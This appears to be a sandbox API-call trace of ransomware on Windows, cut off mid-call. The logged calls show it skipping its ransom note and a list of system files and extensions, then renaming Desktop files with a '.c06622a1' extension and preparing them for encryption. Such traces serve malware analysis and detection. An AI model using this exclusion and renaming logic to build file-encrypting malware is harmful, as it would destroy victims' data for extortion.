lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3501d790, ftCreationTime.dwHighDateTime=0x1d5dafa, ftLastAccessTime.dwLowDateTime=0x41a642c0, ftLastAccessTime.dwHighDateTime=0x1d5e751, ftLastWriteTime.dwLowDateTime=0x41a642c0, ftLastWriteTime.dwHighDateTime=0x1d5e751, nFileSizeHigh=0x0, nFileSizeLow=0xc329, dwReserved0=0x0, dwReserved1=0x0, cFileName="bnqSfXWtMeK2iSUYfI.wav", cAlternateFileName="BNQSFX~1.WAV")) returned 1 [0155.906] _wcsicmp (_Str1="bnqSfXWtMeK2iSUYfI.wav", _Str2="README.c06622a1.TXT") returned -16 [0155.906] wcsstr (_Str="bnqSfXWtMeK2iSUYfI.wav", _SubStr="README") returned 0x0 [0155.906] _wcsicmp (_Str1="autorun.inf", _Str2="bnqSfXWtMeK2iSUYfI.wav") returned -1 [0155.906] wcslen (_String="autorun.inf") returned 0xb [0155.906] _wcsicmp (_Str1="boot.ini", _Str2="bnqSfXWtMeK2iSUYfI.wav") returned 1 [0155.906] wcslen (_String="boot.ini") returned 0x8 [0155.906] _wcsicmp (_Str1="bootfont.bin", _Str2="bnqSfXWtMeK2iSUYfI.wav") returned 1 [0155.907] wcslen (_String="bootfont.bin") returned 0xc [0155.907] _wcsicmp (_Str1="bootsect.bak", _Str2="bnqSfXWtMeK2iSUYfI.wav") returned 1 [0155.907] wcslen (_String="bootsect.bak") returned 0xc [0155.907] _wcsicmp (_Str1="desktop.ini", _Str2="bnqSfXWtMeK2iSUYfI.wav") returned 2 [0155.907] wcslen (_String="desktop.ini") returned 0xb [0155.907] _wcsicmp (_Str1="iconcache.db", _Str2="bnqSfXWtMeK2iSUYfI.wav") returned 7 [0155.907] wcslen (_String="iconcache.db") returned 0xc [0155.907] _wcsicmp (_Str1="ntldr", _Str2="bnqSfXWtMeK2iSUYfI.wav") returned 12 [0155.907] wcslen (_String="ntldr") returned 0x5 [0155.907] _wcsicmp (_Str1="ntuser.dat", _Str2="bnqSfXWtMeK2iSUYfI.wav") returned 12 [0155.907] wcslen (_String="ntuser.dat") returned 0xa [0155.907] _wcsicmp (_Str1="ntuser.dat.log", _Str2="bnqSfXWtMeK2iSUYfI.wav") returned 12 [0155.907] wcslen (_String="ntuser.dat.log") returned 0xe [0155.907] _wcsicmp (_Str1="ntuser.ini", _Str2="bnqSfXWtMeK2iSUYfI.wav") returned 12 [0155.907] wcslen (_String="ntuser.ini") returned 0xa [0155.907] _wcsicmp (_Str1="thumbs.db", _Str2="bnqSfXWtMeK2iSUYfI.wav") returned 18 [0155.907] wcslen (_String="thumbs.db") returned 0x9 [0155.907] _wcsicmp (_Str1="386", _Str2="wav") returned -68 [0155.907] wcslen (_String="386") returned 0x3 [0155.907] _wcsicmp (_Str1="adv", _Str2="wav") returned -22 [0155.907] wcslen (_String="adv") returned 0x3 [0155.907] _wcsicmp (_Str1="ani", _Str2="wav") returned -22 [0155.907] wcslen (_String="ani") returned 0x3 [0155.907] _wcsicmp (_Str1="bat", _Str2="wav") returned -21 [0155.907] wcslen (_String="bat") returned 0x3 [0155.907] _wcsicmp (_Str1="bin", _Str2="wav") returned -21 [0155.907] wcslen (_String="bin") returned 0x3 [0155.907] _wcsicmp (_Str1="cab", _Str2="wav") returned -20 [0155.907] wcslen (_String="cab") returned 0x3 [0155.907] _wcsicmp (_Str1="cmd", _Str2="wav") returned -20 [0155.907] wcslen (_String="cmd") returned 0x3 [0155.907] _wcsicmp (_Str1="com", _Str2="wav") returned -20 [0155.907] wcslen (_String="com") returned 0x3 [0155.908] _wcsicmp (_Str1="cpl", _Str2="wav") returned -20 [0155.908] wcslen (_String="cpl") returned 0x3 [0155.908] _wcsicmp (_Str1="cur", _Str2="wav") returned -20 [0155.908] wcslen (_String="cur") returned 0x3 [0155.908] _wcsicmp (_Str1="deskthemepack", _Str2="wav") returned -19 [0155.908] wcslen (_String="deskthemepack") returned 0xd [0155.908] _wcsicmp (_Str1="diagcab", _Str2="wav") returned -19 [0155.908] wcslen (_String="diagcab") returned 0x7 [0155.908] _wcsicmp (_Str1="diagcfg", _Str2="wav") returned -19 [0155.908] wcslen (_String="diagcfg") returned 0x7 [0155.908] _wcsicmp (_Str1="diagpkg", _Str2="wav") returned -19 [0155.908] wcslen (_String="diagpkg") returned 0x7 [0155.908] _wcsicmp (_Str1="dll", _Str2="wav") returned -19 [0155.908] wcslen (_String="dll") returned 0x3 [0155.908] _wcsicmp (_Str1="drv", _Str2="wav") returned -19 [0155.908] wcslen (_String="drv") returned 0x3 [0155.908] _wcsicmp (_Str1="exe", _Str2="wav") returned -18 [0155.908] wcslen (_String="exe") returned 0x3 [0155.908] _wcsicmp (_Str1="hlp", _Str2="wav") returned -15 [0155.908] wcslen (_String="hlp") returned 0x3 [0155.908] _wcsicmp (_Str1="icl", _Str2="wav") returned -14 [0155.908] wcslen (_String="icl") returned 0x3 [0155.908] _wcsicmp (_Str1="icns", _Str2="wav") returned -14 [0155.908] wcslen (_String="icns") returned 0x4 [0155.908] _wcsicmp (_Str1="ico", _Str2="wav") returned -14 [0155.908] wcslen (_String="ico") returned 0x3 [0155.908] _wcsicmp (_Str1="ics", _Str2="wav") returned -14 [0155.908] wcslen (_String="ics") returned 0x3 [0155.908] _wcsicmp (_Str1="idx", _Str2="wav") returned -14 [0155.908] wcslen (_String="idx") returned 0x3 [0155.908] _wcsicmp (_Str1="ldf", _Str2="wav") returned -11 [0155.908] wcslen (_String="ldf") returned 0x3 [0155.908] _wcsicmp (_Str1="lnk", _Str2="wav") returned -11 [0155.908] wcslen (_String="lnk") returned 0x3 [0155.908] _wcsicmp (_Str1="mod", _Str2="wav") returned -10 [0155.909] wcslen (_String="mod") returned 0x3 [0155.909] _wcsicmp (_Str1="mpa", _Str2="wav") returned -10 [0155.909] wcslen (_String="mpa") returned 0x3 [0155.909] _wcsicmp (_Str1="msc", _Str2="wav") returned -10 [0155.909] wcslen (_String="msc") returned 0x3 [0155.909] _wcsicmp (_Str1="msp", _Str2="wav") returned -10 [0155.909] wcslen (_String="msp") returned 0x3 [0155.909] _wcsicmp (_Str1="msstyles", _Str2="wav") returned -10 [0155.909] wcslen (_String="msstyles") returned 0x8 [0155.909] _wcsicmp (_Str1="msu", _Str2="wav") returned -10 [0155.909] wcslen (_String="msu") returned 0x3 [0155.909] _wcsicmp (_Str1="nls", _Str2="wav") returned -9 [0155.909] wcslen (_String="nls") returned 0x3 [0155.909] _wcsicmp (_Str1="nomedia", _Str2="wav") returned -9 [0155.909] wcslen (_String="nomedia") returned 0x7 [0155.909] _wcsicmp (_Str1="ocx", _Str2="wav") returned -8 [0155.909] wcslen (_String="ocx") returned 0x3 [0155.909] _wcsicmp (_Str1="prf", _Str2="wav") returned -7 [0155.909] wcslen (_String="prf") returned 0x3 [0155.909] _wcsicmp (_Str1="ps1", _Str2="wav") returned -7 [0155.909] wcslen (_String="ps1") returned 0x3 [0155.909] _wcsicmp (_Str1="rom", _Str2="wav") returned -5 [0155.909] wcslen (_String="rom") returned 0x3 [0155.909] _wcsicmp (_Str1="rtp", _Str2="wav") returned -5 [0155.909] wcslen (_String="rtp") returned 0x3 [0155.909] _wcsicmp (_Str1="scr", _Str2="wav") returned -4 [0155.909] wcslen (_String="scr") returned 0x3 [0155.909] _wcsicmp (_Str1="shs", _Str2="wav") returned -4 [0155.909] wcslen (_String="shs") returned 0x3 [0155.909] _wcsicmp (_Str1="spl", _Str2="wav") returned -4 [0155.909] wcslen (_String="spl") returned 0x3 [0155.909] _wcsicmp (_Str1="sys", _Str2="wav") returned -4 [0155.909] wcslen (_String="sys") returned 0x3 [0155.909] _wcsicmp (_Str1="theme", _Str2="wav") returned -3 [0155.909] wcslen (_String="theme") returned 0x5 [0155.910] _wcsicmp (_Str1="themepack", _Str2="wav") returned -3 [0155.910] wcslen (_String="themepack") returned 0x9 [0155.910] _wcsicmp (_Str1="wpx", _Str2="wav") returned 15 [0155.910] wcslen (_String="wpx") returned 0x3 [0155.910] _wcsicmp (_Str1="lock", _Str2="wav") returned -11 [0155.910] wcslen (_String="lock") returned 0x4 [0155.910] _wcsicmp (_Str1="key", _Str2="wav") returned -12 [0155.910] wcslen (_String="key") returned 0x3 [0155.910] _wcsicmp (_Str1="hta", _Str2="wav") returned -15 [0155.910] wcslen (_String="hta") returned 0x3 [0155.910] _wcsicmp (_Str1="msi", _Str2="wav") returned -10 [0155.910] wcslen (_String="msi") returned 0x3 [0155.910] _wcsicmp (_Str1="pdb", _Str2="wav") returned -7 [0155.910] wcslen (_String="pdb") returned 0x3 [0155.910] _wcsicmp (_Str1="sqlite", _Str2="wav") returned -4 [0155.910] wcslen (_String="sqlite") returned 0x6 [0155.910] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0155.910] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0155.910] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0155.910] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0155.910] wcscpy (in: _Dest=0x208e74, _Source="bnqSfXWtMeK2iSUYfI.wav" | out: _Dest="bnqSfXWtMeK2iSUYfI.wav") returned="bnqSfXWtMeK2iSUYfI.wav" [0155.910] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bnqSfXWtMeK2iSUYfI.wav", dwFileAttributes=0x80) returned 1 [0155.911] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bnqSfXWtMeK2iSUYfI.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bnqsfxwtmek2isuyfi.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0155.911] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.911] ReadFile (in: hFile=0x1a4, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0155.911] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x38790639 [0155.911] RtlComputeCrc32 (PartialCrc=0x639, Buffer=0x32ec24, Length=0x80) returned 0xa75473c8 [0155.912] RtlComputeCrc32 (PartialCrc=0x73c8, Buffer=0x32ec24, Length=0x80) returned 0xe451e189 [0155.912] RtlComputeCrc32 (PartialCrc=0xe189, Buffer=0x32ec24, Length=0x80) returned 0x48431b6f [0155.912] RtlComputeCrc32 (PartialCrc=0x1b6f, Buffer=0x32ec24, Length=0x80) returned 0x96550893 [0155.912] CloseHandle (hObject=0x1a4) returned 1 [0155.912] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x218e28 [0155.912] wcscpy (in: _Dest=0x218e28, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bnqSfXWtMeK2iSUYfI.wav" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bnqSfXWtMeK2iSUYfI.wav") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bnqSfXWtMeK2iSUYfI.wav" [0155.912] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bnqSfXWtMeK2iSUYfI.wav") returned 0x40 [0155.912] wcscpy (in: _Dest=0x218ea8, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.912] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bnqSfXWtMeK2iSUYfI.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bnqsfxwtmek2isuyfi.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bnqSfXWtMeK2iSUYfI.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bnqsfxwtmek2isuyfi.wav.c06622a1"), dwFlags=0x8) returned 1 [0155.914] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bnqSfXWtMeK2iSUYfI.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bnqsfxwtmek2isuyfi.wav.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a4 [0155.914] CreateIoCompletionPort (FileHandle=0x1a4, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0155.915] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3870020 [0155.921] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xcd3302d [0155.921] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5e81c6e [0155.921] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x53cc3d5c [0155.921] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x25a8be5c [0155.921] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1d3af76 [0155.921] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x32f9ffec [0155.921] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x102c9f57 [0155.921] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5f6746ca [0155.924] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3870094, Length=0x80) returned 0xba18510c [0155.924] RtlComputeCrc32 (PartialCrc=0x510c, Buffer=0x3870094, Length=0x80) returned 0x632fe00a [0155.924] RtlComputeCrc32 (PartialCrc=0xe00a, Buffer=0x3870094, Length=0x80) returned 0xa3fd4ace [0155.924] RtlComputeCrc32 (PartialCrc=0x4ace, Buffer=0x3870094, Length=0x80) returned 0x6c8025ec [0155.925] RtlComputeCrc32 (PartialCrc=0x25ec, Buffer=0x3870094, Length=0x80) returned 0xa7ce7fa [0155.925] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3870020) returned 1 [0155.925] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0155.925] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x218e28) returned 1 [0155.925] FindNextFileW (in: hFindFile=0x1327c8, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ca5d110, ftCreationTime.dwHighDateTime=0x1d5df7d, ftLastAccessTime.dwLowDateTime=0x45f4a5f0, ftLastAccessTime.dwHighDateTime=0x1d5e7ac, ftLastWriteTime.dwLowDateTime=0x45f4a5f0, ftLastWriteTime.dwHighDateTime=0x1d5e7ac, nFileSizeHigh=0x0, nFileSizeLow=0x1234d, dwReserved0=0x0, dwReserved1=0x0, cFileName="CRnGB23a2oNLH1b.gif", cAlternateFileName="CRNGB2~1.GIF")) returned 1 [0155.925] _wcsicmp (_Str1="CRnGB23a2oNLH1b.gif", _Str2="README.c06622a1.TXT") returned -15 [0155.925] wcsstr (_Str="CRnGB23a2oNLH1b.gif", _SubStr="README") returned 0x0 [0155.925] _wcsicmp (_Str1="autorun.inf", _Str2="CRnGB23a2oNLH1b.gif") returned -2 [0155.925] wcslen (_String="autorun.inf") returned 0xb [0155.925] _wcsicmp (_Str1="boot.ini", _Str2="CRnGB23a2oNLH1b.gif") returned -1 [0155.925] wcslen (_String="boot.ini") returned 0x8 [0155.925] _wcsicmp (_Str1="bootfont.bin", _Str2="CRnGB23a2oNLH1b.gif") returned -1 [0155.925] wcslen (_String="bootfont.bin") returned 0xc [0155.925] _wcsicmp (_Str1="bootsect.bak", _Str2="CRnGB23a2oNLH1b.gif") returned -1 [0155.925] wcslen (_String="bootsect.bak") returned 0xc [0155.925] _wcsicmp (_Str1="desktop.ini", _Str2="CRnGB23a2oNLH1b.gif") returned 1 [0155.925] wcslen (_String="desktop.ini") returned 0xb [0155.925] _wcsicmp (_Str1="iconcache.db", _Str2="CRnGB23a2oNLH1b.gif") returned 6 [0155.925] wcslen (_String="iconcache.db") returned 0xc [0155.925] _wcsicmp (_Str1="ntldr", _Str2="CRnGB23a2oNLH1b.gif") returned 11 [0155.925] wcslen (_String="ntldr") returned 0x5 [0155.925] _wcsicmp (_Str1="ntuser.dat", _Str2="CRnGB23a2oNLH1b.gif") returned 11 [0155.925] wcslen (_String="ntuser.dat") returned 0xa [0155.925] _wcsicmp (_Str1="ntuser.dat.log", _Str2="CRnGB23a2oNLH1b.gif") returned 11 [0155.925] wcslen (_String="ntuser.dat.log") returned 0xe [0155.925] _wcsicmp (_Str1="ntuser.ini", _Str2="CRnGB23a2oNLH1b.gif") returned 11 [0155.925] wcslen (_String="ntuser.ini") returned 0xa [0155.925] _wcsicmp (_Str1="thumbs.db", _Str2="CRnGB23a2oNLH1b.gif") returned 17 [0155.925] wcslen (_String="thumbs.db") returned 0x9 [0155.925] _wcsicmp (_Str1="386", _Str2="gif") returned -52 [0155.925] wcslen (_String="386") returned 0x3 [0155.925] _wcsicmp (_Str1="adv", _Str2="gif") returned -6 [0155.926] wcslen (_String="adv") returned 0x3 [0155.926] _wcsicmp (_Str1="ani", _Str2="gif") returned -6 [0155.926] wcslen (_String="ani") returned 0x3 [0155.926] _wcsicmp (_Str1="bat", _Str2="gif") returned -5 [0155.926] wcslen (_String="bat") returned 0x3 [0155.926] _wcsicmp (_Str1="bin", _Str2="gif") returned -5 [0155.926] wcslen (_String="bin") returned 0x3 [0155.926] _wcsicmp (_Str1="cab", _Str2="gif") returned -4 [0155.926] wcslen (_String="cab") returned 0x3 [0155.926] _wcsicmp (_Str1="cmd", _Str2="gif") returned -4 [0155.926] wcslen (_String="cmd") returned 0x3 [0155.926] _wcsicmp (_Str1="com", _Str2="gif") returned -4 [0155.926] wcslen (_String="com") returned 0x3 [0155.926] _wcsicmp (_Str1="cpl", _Str2="gif") returned -4 [0155.926] wcslen (_String="cpl") returned 0x3 [0155.926] _wcsicmp (_Str1="cur", _Str2="gif") returned -4 [0155.926] wcslen (_String="cur") returned 0x3 [0155.926] _wcsicmp (_Str1="deskthemepack", _Str2="gif") returned -3 [0155.926] wcslen (_String="deskthemepack") returned 0xd [0155.926] _wcsicmp (_Str1="diagcab", _Str2="gif") returned -3 [0155.926] wcslen (_String="diagcab") returned 0x7 [0155.926] _wcsicmp (_Str1="diagcfg", _Str2="gif") returned -3 [0155.926] wcslen (_String="diagcfg") returned 0x7 [0155.926] _wcsicmp (_Str1="diagpkg", _Str2="gif") returned -3 [0155.926] wcslen (_String="diagpkg") returned 0x7 [0155.926] _wcsicmp (_Str1="dll", _Str2="gif") returned -3 [0155.926] wcslen (_String="dll") returned 0x3 [0155.926] _wcsicmp (_Str1="drv", _Str2="gif") returned -3 [0155.926] wcslen (_String="drv") returned 0x3 [0155.926] _wcsicmp (_Str1="exe", _Str2="gif") returned -2 [0155.926] wcslen (_String="exe") returned 0x3 [0155.926] _wcsicmp (_Str1="hlp", _Str2="gif") returned 1 [0155.926] wcslen (_String="hlp") returned 0x3 [0155.926] _wcsicmp (_Str1="icl", _Str2="gif") returned 2 [0155.926] wcslen (_String="icl") returned 0x3 [0155.927] _wcsicmp (_Str1="icns", _Str2="gif") returned 2 [0155.927] wcslen (_String="icns") returned 0x4 [0155.927] _wcsicmp (_Str1="ico", _Str2="gif") returned 2 [0155.927] wcslen (_String="ico") returned 0x3 [0155.927] _wcsicmp (_Str1="ics", _Str2="gif") returned 2 [0155.927] wcslen (_String="ics") returned 0x3 [0155.927] _wcsicmp (_Str1="idx", _Str2="gif") returned 2 [0155.927] wcslen (_String="idx") returned 0x3 [0155.927] _wcsicmp (_Str1="ldf", _Str2="gif") returned 5 [0155.927] wcslen (_String="ldf") returned 0x3 [0155.927] _wcsicmp (_Str1="lnk", _Str2="gif") returned 5 [0155.927] wcslen (_String="lnk") returned 0x3 [0155.927] _wcsicmp (_Str1="mod", _Str2="gif") returned 6 [0155.927] wcslen (_String="mod") returned 0x3 [0155.927] _wcsicmp (_Str1="mpa", _Str2="gif") returned 6 [0155.927] wcslen (_String="mpa") returned 0x3 [0155.927] _wcsicmp (_Str1="msc", _Str2="gif") returned 6 [0155.927] wcslen (_String="msc") returned 0x3 [0155.927] _wcsicmp (_Str1="msp", _Str2="gif") returned 6 [0155.927] wcslen (_String="msp") returned 0x3 [0155.927] _wcsicmp (_Str1="msstyles", _Str2="gif") returned 6 [0155.927] wcslen (_String="msstyles") returned 0x8 [0155.927] _wcsicmp (_Str1="msu", _Str2="gif") returned 6 [0155.927] wcslen (_String="msu") returned 0x3 [0155.927] _wcsicmp (_Str1="nls", _Str2="gif") returned 7 [0155.927] wcslen (_String="nls") returned 0x3 [0155.927] _wcsicmp (_Str1="nomedia", _Str2="gif") returned 7 [0155.927] wcslen (_String="nomedia") returned 0x7 [0155.927] _wcsicmp (_Str1="ocx", _Str2="gif") returned 8 [0155.927] wcslen (_String="ocx") returned 0x3 [0155.927] _wcsicmp (_Str1="prf", _Str2="gif") returned 9 [0155.927] wcslen (_String="prf") returned 0x3 [0155.927] _wcsicmp (_Str1="ps1", _Str2="gif") returned 9 [0155.927] wcslen (_String="ps1") returned 0x3 [0155.927] _wcsicmp (_Str1="rom", _Str2="gif") returned 11 [0155.927] wcslen (_String="rom") returned 0x3 [0155.928] _wcsicmp (_Str1="rtp", _Str2="gif") returned 11 [0155.928] wcslen (_String="rtp") returned 0x3 [0155.928] _wcsicmp (_Str1="scr", _Str2="gif") returned 12 [0155.928] wcslen (_String="scr") returned 0x3 [0155.928] _wcsicmp (_Str1="shs", _Str2="gif") returned 12 [0155.928] wcslen (_String="shs") returned 0x3 [0155.928] _wcsicmp (_Str1="spl", _Str2="gif") returned 12 [0155.928] wcslen (_String="spl") returned 0x3 [0155.928] _wcsicmp (_Str1="sys", _Str2="gif") returned 12 [0155.928] wcslen (_String="sys") returned 0x3 [0155.928] _wcsicmp (_Str1="theme", _Str2="gif") returned 13 [0155.928] wcslen (_String="theme") returned 0x5 [0155.928] _wcsicmp (_Str1="themepack", _Str2="gif") returned 13 [0155.928] wcslen (_String="themepack") returned 0x9 [0155.928] _wcsicmp (_Str1="wpx", _Str2="gif") returned 16 [0155.928] wcslen (_String="wpx") returned 0x3 [0155.928] _wcsicmp (_Str1="lock", _Str2="gif") returned 5 [0155.928] wcslen (_String="lock") returned 0x4 [0155.928] _wcsicmp (_Str1="key", _Str2="gif") returned 4 [0155.928] wcslen (_String="key") returned 0x3 [0155.928] _wcsicmp (_Str1="hta", _Str2="gif") returned 1 [0155.928] wcslen (_String="hta") returned 0x3 [0155.928] _wcsicmp (_Str1="msi", _Str2="gif") returned 6 [0155.928] wcslen (_String="msi") returned 0x3 [0155.928] _wcsicmp (_Str1="pdb", _Str2="gif") returned 9 [0155.928] wcslen (_String="pdb") returned 0x3 [0155.928] _wcsicmp (_Str1="sqlite", _Str2="gif") returned 12 [0155.928] wcslen (_String="sqlite") returned 0x6 [0155.928] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0155.928] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0155.928] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0155.929] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0155.929] wcscpy (in: _Dest=0x208e74, _Source="CRnGB23a2oNLH1b.gif" | out: _Dest="CRnGB23a2oNLH1b.gif") returned="CRnGB23a2oNLH1b.gif" [0155.929] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CRnGB23a2oNLH1b.gif", dwFileAttributes=0x80) returned 1 [0155.929] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CRnGB23a2oNLH1b.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\crngb23a2onlh1b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0155.929] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.929] ReadFile (in: hFile=0x1a0, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0155.930] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0xa880cc45 [0155.930] RtlComputeCrc32 (PartialCrc=0xcc45, Buffer=0x32ec24, Length=0x80) returned 0x9f75ec2b [0155.930] RtlComputeCrc32 (PartialCrc=0xec2b, Buffer=0x32ec24, Length=0x80) returned 0x3cc3087c [0155.930] RtlComputeCrc32 (PartialCrc=0x87c, Buffer=0x32ec24, Length=0x80) returned 0xd44bac0a [0155.930] RtlComputeCrc32 (PartialCrc=0xac0a, Buffer=0x32ec24, Length=0x80) returned 0x477aafbc [0155.930] CloseHandle (hObject=0x1a0) returned 1 [0155.930] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x218e28 [0155.930] wcscpy (in: _Dest=0x218e28, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CRnGB23a2oNLH1b.gif" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CRnGB23a2oNLH1b.gif") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CRnGB23a2oNLH1b.gif" [0155.930] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CRnGB23a2oNLH1b.gif") returned 0x3d [0155.930] wcscpy (in: _Dest=0x218ea2, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.930] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CRnGB23a2oNLH1b.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\crngb23a2onlh1b.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CRnGB23a2oNLH1b.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\crngb23a2onlh1b.gif.c06622a1"), dwFlags=0x8) returned 1 [0155.933] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CRnGB23a2oNLH1b.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\crngb23a2onlh1b.gif.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a0 [0155.933] CreateIoCompletionPort (FileHandle=0x1a0, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0155.933] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3900020 [0155.941] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x57592545 [0155.941] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x41124ae1 [0155.941] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x33e3062e [0155.941] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x19f0fde0 [0155.941] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3c5d1669 [0155.941] RtlRandomEx 